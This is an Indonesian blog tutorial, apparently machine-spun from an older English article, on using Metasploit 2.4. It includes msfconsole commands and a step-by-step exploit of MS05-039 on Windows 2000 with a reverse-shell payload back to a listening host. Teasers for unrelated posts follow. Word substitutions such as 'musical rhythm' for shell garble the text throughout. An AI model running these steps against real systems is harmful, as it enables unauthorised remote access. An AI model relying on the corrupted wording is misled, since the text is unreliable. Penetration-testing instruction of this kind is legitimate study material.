Update, Cara Menggunakan Metasploit


      Dalam artikel ini, saya akan memperkenalkan manfaat menggunakan Metasploit Framework untuk pengujian keamanan. Berbasis di Perl ...
      Metasploit dirancang untuk menjadi sistem pengembangan eksploitasi yang kuat. Kebetulan bahwa Anda dapat menggunakannya untuk menjalankan eksploitasi yang dikembangkan sebelumnya terhadap sistem Anda sendiri. Anda dapat menggunakan fitur pengujian keamanannya untuk melihat apakah sistem Anda rentan terhadap penetrasi dan bagaimana mereka bereaksi ketika payload tertentu dikirimkan.

      Di luar tes aplikasi Web umum seperti injeksi SQL dan gangguan input yang tidak didukung, Metasploit telah mengeksploitasi kode untuk berbagai kerentanan dalam aplikasi mandiri, server Web, sistem operasi, dan lebih banyak - 100 exploit dan 75 payloads dalam versi 2.4 tepatnya. Versi 2.5 baru saja dirilis yang, menurut situs Metasploit, termasuk perbaikan bug, perubahan kosmetik, dan 32 eksploitasi lainnya!Bahkan dengan lebih dari 100 eksploitasi untuk dipilih, jelas ini tidak cukup untuk mengeksploitasi setiap kemungkinan kerentanan dalam setiap skenario pengujian penetrasi yang Anda temui. Tetapi sekali lagi, Framework ini dapat di modivikasi sehingga Anda meraciknya sendiri sesuai kebutuhan.

Cara menggunakan perintah Metasploit

Sebelum melompat ke langkah-langkah spesifik untuk mengeksploitasi exploit ini, ada beberapa perintah msfconsole umum yang harus Anda ketahui:
  • help (atau '?') – menampilkan semua perintah yang tersedia di msfconsole
  • show exploits - menunjukkan exploit yang dapat Anda jalankan (dalam kasus kami di sini eksploitasi ms05_039_pnp )
  • show payloads - menunjukkan berbagai opsi payload yang dapat Anda jalankan pada sistem yang dieksploitasi seperti menelurkan musical rhythm perintah, mengunggah plan untuk dijalankan, dll. (dalam kasus kami di sini eksploitasi win32_reverse )
  • info exploit [nama exploit] - menunjukkan deskripsi nama exploit tertentu beserta berbagai opsi dan persyaratannya (mis. info exploit ms05_039_pnp menampilkan informasi tentang serangan spesifik itu)
  • info payload [nama payload] - menampilkan deskripsi nama payload tertentu beserta berbagai opsi dan persyaratannya (mis. info payload win32_reverse menampilkan informasi tentang cara memunculkan perintah shell)
  • use [nama exploit] - menginstruksikan msfconsole untuk masuk ke lingkungan eksploit tertentu (mis. use ms05_039_pnp akan memunculkan ascendancy prompt ms05_039_pnp> untuk exploit khusus ini
  • show options – menunjukkan berbagai parameter untuk exploit spesifik yang sedang Anda kerjakan
  • show payloads - menunjukkan payload yang kompatibel dengan exploit spesifik yang sedang Anda tangani
  • set PAYLOAD - memungkinkan Anda untuk mengatur payload spesifik untuk exploit Anda (dalam contoh ini, set PAYLOAD win32_reverse )
  • show targets - menunjukkan OS target yang tersedia dan aplikasi yang dapat dieksploitasi
  • set TARGET - memungkinkan Anda untuk memilih target OS / aplikasi spesifik Anda (dalam contoh ini, saya akan menggunakan set TARGET 0 untuk untuk semua versi bahasa Inggris Windows 2000)
  • set RHOST - memungkinkan Anda untuk menetapkan alamat IP host target Anda (dalam contoh ini, set RHOST 10.0.0.200 )
  • set LHOST - memungkinkan Anda untuk mengatur alamat IP host lokal untuk komunikasi balik yang diperlukan untuk membuka musical rhythm perintah sebaliknya (dalam contoh ini, set LHOST 10.0.0.201 )
  • back - memungkinkan Anda untuk keluar dari lingkungan exploit saat ini yang telah Anda muat dan kembali ke prompt msfconsole utama

Cara menggunakan Metasploit: Eksploitasi dunia nyata

Sekarang saya telah menggambarkan perintah dasar yang Anda perlukan, mari kita lihat beberapa langkah dan tangkapan layar khusus yang diperlukan untuk melakukan eksploitasi dunia nyata.
Target pengujian saya dalam contoh ini adalah sistem Windows 2000 Server yang memiliki kerentanan plug in addition to play MS05-039 (CVE-2005-1983) yang dieksploitasi oleh worm Zotob.Lubang ini - yang kebetulan digunakan oleh Metasploit - memungkinkan eksekusi kode arbitrer termasuk akses musical rhythm (command prompt) ke sistem. Saya tahu sistem target saya memiliki kerentanan ini karena saya menemukan masalah dengan alat penilaian kerentanan QualysGuard. Ini murni bagian dari metodologi peretasan etis, tetapi tidak diperlukan. Anda dapat menguji sistem Anda secara membabi buta - atau, bahkan lebih baik lagi - Metasploit dapat melakukan beberapa kerja keras untuk Anda dengan fungsi "check" untuk melihat apakah suatu sistem rentan sebelum mengeksploitasi. Lebih lanjut tentang ini di bawah ini. Sistem pengujian saya adalah sistem Windows XP SP2 yang menjalankan Metasploit Framework versi 2.4 yangsaya unduh dan instal. Saya akan menggunakan antarmuka msfconsole yang paling sering digunakan Metasploit untuk mendemonstrasikan serangan ini.


Cara Menggunakan Metasploit: Langkah 1
Saya memuat msfconsole (melalui Start/Programs/Metasploit Framework/MSFConsole) dan prompt perintahnya muncul:



Catatan: Pada titik ini Anda dapat memasukkan exhibit exploits untuk melihat eksploit mana yang tersedia untuk sistem target Anda.

Cara Menggunakan Metasploit: Langkah 2 
Saya masuk "use ms05_039_pnp" untuk menjalankan exploit spesifik yang saya tahu sistemnya rentan, dan memuat prompt lingkungan exploit spesifik itu (maka ms05_039_pnp> prompt):
gambar two

Cara Menggunakan Metasploit: Langkah 3 
Saya kemudian masukkan show payloads untuk menentukan payload mana yang dapat dikirim melalui exploit ini:

Cara Menggunakan Metasploit: Langkah 4 
Saya memutuskan untuk mengeksploitasi membuka musical rhythm perintah terbalik, jadi saya masukkan set PAYLOAD win32_reverse . Saya kemudian memasukkan target pertunjukan untuk menentukan sistem operasi dan aplikasi mana yang didukung. Dalam hal ini, saya akan menetapkan target saya ke opsi yang mendukung versi Windows 2000 Paket Layanan 0 (versi pertama Windows 2000) melalui Paket Layanan iv dengan memasukkan "set TARGET 0" :



Cara Menggunakan Metasploit: Langkah 5 
Saya kemudian memasukkan "show options" untuk menentukan parameter exploit dan payload non-opsional yang tidak memiliki default dan, oleh karena itu, harus ditetapkan. Dalam hal ini, ini adalah parameter RHOST dan LHOST yang dapat ditetapkan melalui set RHOST 10.0.0.200 dan set LHOST 10.0.0.201:

Cara Menggunakan Metasploit: Langkah 6 
Saya memasukkan opsi pertunjukan satu kali terakhir untuk memastikan semuanya diatur dengan benar dan kemudian masukkan "check" untuk mengonfirmasi bahwa sistem target saya memang rentan terhadap kerentanan ms05_039_pnp



Cara Menggunakan Metasploit: Langkah 7 
Terakhir, saya memasukkan "exploit" untuk menjalankan exploit dan mengirim payload ke sistem target saya - dan voila - koneksi dibuat dan saya memiliki prompt perintah pada sistem remote! Pengujian penetrasi yang terbaik:


Anda dapat membayangkan apa yang bisa terjadi pada titik ini jika peretas jahat membahayakan sistem Anda dengan cara ini. Itu sebabnya sangat penting untuk "meretas" sistem Anda sendiri terlebih dahulu sehingga Anda dapat menemukan dan menyumbat lubang sebelum orang jahat mengeksploitasi mereka.

Menggunakan Metasploit: Masih ada lagi yang akan datang 


Eksploitasi ini hanyalah salah satu contoh dari apa yang dapat dilakukan dengan menggunakan Metasploit selama pengujian penetrasi. Hal baiknya adalah bahwa di luar eksploit dan payload spesifik yang saya gunakan, sebagian besar perintah dan teknik dalam contoh ini dapat diterapkan langsung ke eksploit yang didukung Metasploit lainnya.
Setelah terbiasa dengan cara kerja Metasploit, Anda akan senang mengetahui bahwa Metasploit berisi beberapa fitur canggih. Anda dapat menyimpan opsi "set", mencatat tindakan Anda, dan bahkan menentukan bagaimana setiap payload akan dibersihkan setelah selesai dijalankan. Hal yang rapi tentang Metasploit adalah ia begitu kuat namun begitu mudah digunakan. Msfconsole sangat intuitif dan bantuan selalu hanya berjarak perintah.
Saya mendorong Anda untuk bermain-main dengan Metasploit di lingkungan pengujian untuk melihat sendiri apa yang dapat dilakukannya. Ini adalah bukti alat konsep yang mencerahkan untuk sedikitnya. Jika Anda tetap terhubung ke situs Web Proyek Metasploit, Anda dapat tetap mengikuti framework terbaru dan mengeksploitasi rilis. Rupanya, versi baru dan lebih baik dari Metasploit (versi 3) yang ditulis dalam bahasa pemrograman Ruby akan segera keluar, jadi waspadalah juga.


Sungguh menyenangkan bagi saya bahwa kami memiliki alat canggih seperti Metasploit yang kami miliki untuk peningkatan keamanan informasi - terutama untuk harga rendah $ 0 dalam kasus ini. Jenis alat eksploitasi ini tentu saja akan memainkan peran penting di masa depan untuk meningkatkan kualitas perangkat lunak secara keseluruhan, sehingga semakin banyak yang Anda ketahui tentang mereka, semakin baik. Dengan unduhan Metasploit cepat, instal mudah, dan beberapa menit membiasakan diri dengan antarmuka, masa depan adalah milik Anda.

Comments

Post a Comment

Popular posts from this blog

Update, Download 10+ Peel Bussid / Jitney Simulator Indonesia Keren

Image
Di Postingan sebelumnya saya pernah membuat janji akan berbagi peel bussid untuk ke sekian kalinya. Dan alhamdulillah hari ini saya diberikan kesempatan untuk memenuhi janji saya tersebut. Melalui postingan ini saya ingin membagikan beberapa koleksi livery atau template charabanc simulator Republic of Indonesia yang telah saya kumpulkan dari berbagai sumber di internet. Bagi yang belum sempat mendownload / membaca artikel yang berkenaan dengan livery bussid yang pernah saya posting, silahkan mampir dulu melalui link di bawah ini : Download Koleksi Livery Bussid Persija HD Download 23+ Livery / Template BUSSID (Bus Simulator Indonesia) Keren dan Terbaru Download Kumpulan Livery Bus Simulator Republic of Indonesia Jernih Untuk sobat yang kebetulan adalah seorang Bus Mania atau Pencinta Bus Republic of Indonesia pastinya tidak akan asing mendengar nama-nama charabanc di bawah ini. Sebab, charabanc ini seringkali melintas di jalanan di Indonesia, utamanya di Jalur Pantura hehe.
Read more

Update, Cara Membuat Desain Stempel Dengan Corel Depict Untuk Pemula

Image
Stempel merupakan suatu alat yang memiliki peran penting terutama bagi perusahaan-perusahaan swasta maupun instansi pemerintah. Stempel ini digunakan sebagai tanda pengesahan, alat bukti pelunasan, tanda terima kasih, dan lain-lain. Jika kita perhatikan, ada berbagai macam jenis atau bentuk cap stempel yang ada di dunia ini. Mulai dari stempel lingkaran, oval, segitiga, bahkan ada cap stempel yang hanya berbentuk tulisan saja. Walaupun ada banyak, pada umumnya stempel berbentuk lingkaran lah yang paling banyak digunakan saat ini. Mungkin dikarenakan proses pembuatannya cukup mudah ketimbang membuat stempel yang berbentuk aneh-aneh. Dan cap stempel berbentuk lingkaran juga dapat dimasukan banyak tulisan. Berbicara mengenai cap / stempel, di artikel kali ini saya ingin berbagi kepada sobat semua tentang bagaimana caranya membuat desain stempel dengan bantuan aplikasi Corel Draw. Pada tutorial ini, saya ingin membahas pembuatan stempel berbentuk bulat / lingkaran. Karena menurut sa
Read more

Update, Kode Warna Html Lengkap Sum Color

Image
Kode Warna HTML lengkap Full Color - Kode warna html merupakah sebuah perintah dalam html untuk membuat warna-warna tertentu. Ada begitu banyak kode warna html yang bisa digunakan. Mulai dari warna hitam, warna emas, sampai warna transparan pun ada. Jadi, dengan adanya kode warna html  ini maka hal itu akan mempermudah sobat ketika sedang mendesain tampilan situs yang sobat miliki. Selain untuk mendesain situs, ternyata kode warna ini juga berlaku pada aplikasi desain foto dan video. Contohnya Aplikasi Photoshop dan Adobe Premiere Pro. Dan uniknya, kode warna yang digunakan pun sama, tidak ada yang berubah. Biasanya kode warna html ditulis langsung menggunakan bahasa Inggris dari warna tersebut. Misalnya, ketika saya ingin membuat sebuah teks berwarna biru maka saya tinggal menambahkan kata "blue" pada flat di css. Misalnya : .TeksWarnaBiru { color: blue ; } Adapun penulisan kode warna selain menggunakan kata dalam bahasa Inggris seperti contoh di atas adalah den
Read more